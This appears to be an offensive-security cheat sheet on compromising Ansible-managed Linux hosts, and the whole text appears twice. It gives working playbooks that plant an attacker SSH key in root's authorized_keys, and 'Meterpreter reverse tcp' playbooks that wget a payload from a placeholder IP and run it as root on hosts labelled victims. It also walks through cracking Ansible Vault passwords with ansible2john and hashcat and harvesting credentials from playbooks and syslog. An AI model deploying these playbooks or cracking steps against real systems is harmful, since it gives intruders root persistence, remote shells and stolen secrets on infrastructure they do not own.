Ansible

Enumerating Ansible

Is Ansible in use? (Server)

ansible

ls /etc/ansible

grep ansible /etc/passwd

Identify Ansible nodes (Client)

grep ansible /etc/passwd

Attack Vectors

Initiated from server
ad-hoc commands
playbooks
Running ansible commands

su ansibleadm

ansible victims -a "whoami"

running as root the name victims comes from the /etc/ansible/hosts file so adjust as needed

ansible victims -a "whoami" --become

ansible appservers -a "whoami"

Ansible Playbooks

Running playbooks

ansible-playbook [playbookname.yml]

Exploiting Playbooks

root

run playbooks as the ansible user

not root

search for hardcoded creds in playbooks
- ansible_become_pass
- /var/log/syslog | grep for pass

Adding tasks if writable

- name: Get system info
	hosts: all
	gather_facts: true
	become: yes
	tasks:
		- name: Display info
		  debug:
			msg: "The hostname is {{ ansible_hostname }} and the OS is {{ansible_distribution }}"

		- name: Create a directory if it does not exist
			file:
				path: /root/.ssh
				state: directory
				mode: '0700'
				owner: root
				group: root
				
		- name: Create authorized keys if it does not exist
			file:
				path: /root/.ssh/authorized_keys
				state: touch
				mode: '0600'
				owner: root
				group: root
				
		- name: Update keys
			lineinfile:
				path: /root/.ssh/authorized_keys
				line: "ssh-rsa AAAAB3NzaC1...Z86SOm..."
				insertbefore: EOF

Reverse Meterpreter

- name: Meterpreter reverse tcp
  hosts: linuxvictim
  gather_facts: true
  become: yes
  become_user: root
  tasks:
  - name: Run command
    shell: "mkdir /tmp/shell"
    async: 10
    poll: 0
  - name: Run command
    shell: "wget http://192.168.X.Y/final.out -P /tmp/shell/"
    async: 10
    poll: 0
  - name: Run command
    shell: "chmod +x /tmp/shell/final.out "
    async: 10
    poll: 0
  - name: Run command
    shell: "/tmp/shell/final.out &"
    async: 10

- name: Meterpreter reverse tcp
  hosts: linuxvictim
  gather_facts: true
  become: yes
  become_user: root
  tasks:
  - name: Run command
    shell: "mkdir /tmp/shell && wget http://192.168.X.Y/final.out -P /tmp/shell/ && chmod +x /tmp/shell/final.out && /tmp/shell/final.out &"   
    async: 10
    poll: 0

Ansible Vault

Copy encrypted password

use ansible2john.py
returns string for hashcat to use

python3 /usr/share/john/ansible2john.py ./test.yml > ans2johnhash.txt

copy string into testhash.txt
then run hashcat

hashcat testhash.txt --force --hash-type=16900 /usr/share/wordlists/rockyou.txt

copy original vault string to text file and use ansible-vault decrypt with the discovered password

cat pw.txt | ansible-vault decrypt

Ansible Data Leakage

leak to /var/log/syslog
Cleartext in playbooks
unless nolog is set in the playbook

PreviousKerberos Cache File NextPrivilege Escalation

Last updated 3 years ago

Was this helpful?

Ansible

Enumerating Ansible

Is Ansible in use? (Server)

ansible

ls /etc/ansible

grep ansible /etc/passwd

Identify Ansible nodes (Client)

grep ansible /etc/passwd

Attack Vectors

Initiated from server
ad-hoc commands
playbooks
Running ansible commands

su ansibleadm

ansible victims -a "whoami"

running as root the name victims comes from the /etc/ansible/hosts file so adjust as needed

ansible victims -a "whoami" --become

ansible appservers -a "whoami"

Ansible Playbooks

Running playbooks

ansible-playbook [playbookname.yml]

Exploiting Playbooks

root

run playbooks as the ansible user

not root

search for hardcoded creds in playbooks
- ansible_become_pass
- /var/log/syslog | grep for pass

Adding tasks if writable

- name: Get system info
	hosts: all
	gather_facts: true
	become: yes
	tasks:
		- name: Display info
		  debug:
			msg: "The hostname is {{ ansible_hostname }} and the OS is {{ansible_distribution }}"

		- name: Create a directory if it does not exist
			file:
				path: /root/.ssh
				state: directory
				mode: '0700'
				owner: root
				group: root
				
		- name: Create authorized keys if it does not exist
			file:
				path: /root/.ssh/authorized_keys
				state: touch
				mode: '0600'
				owner: root
				group: root
				
		- name: Update keys
			lineinfile:
				path: /root/.ssh/authorized_keys
				line: "ssh-rsa AAAAB3NzaC1...Z86SOm..."
				insertbefore: EOF

Reverse Meterpreter

- name: Meterpreter reverse tcp
  hosts: linuxvictim
  gather_facts: true
  become: yes
  become_user: root
  tasks:
  - name: Run command
    shell: "mkdir /tmp/shell"
    async: 10
    poll: 0
  - name: Run command
    shell: "wget http://192.168.X.Y/final.out -P /tmp/shell/"
    async: 10
    poll: 0
  - name: Run command
    shell: "chmod +x /tmp/shell/final.out "
    async: 10
    poll: 0
  - name: Run command
    shell: "/tmp/shell/final.out &"
    async: 10

- name: Meterpreter reverse tcp
  hosts: linuxvictim
  gather_facts: true
  become: yes
  become_user: root
  tasks:
  - name: Run command
    shell: "mkdir /tmp/shell && wget http://192.168.X.Y/final.out -P /tmp/shell/ && chmod +x /tmp/shell/final.out && /tmp/shell/final.out &"   
    async: 10
    poll: 0

Ansible Vault

Copy encrypted password

use ansible2john.py
returns string for hashcat to use

python3 /usr/share/john/ansible2john.py ./test.yml > ans2johnhash.txt

copy string into testhash.txt
then run hashcat

hashcat testhash.txt --force --hash-type=16900 /usr/share/wordlists/rockyou.txt

copy original vault string to text file and use ansible-vault decrypt with the discovered password

cat pw.txt | ansible-vault decrypt

Ansible Data Leakage

leak to /var/log/syslog
Cleartext in playbooks
unless nolog is set in the playbook

PreviousKerberos Cache File NextPrivilege Escalation

Last updated 3 years ago

Was this helpful?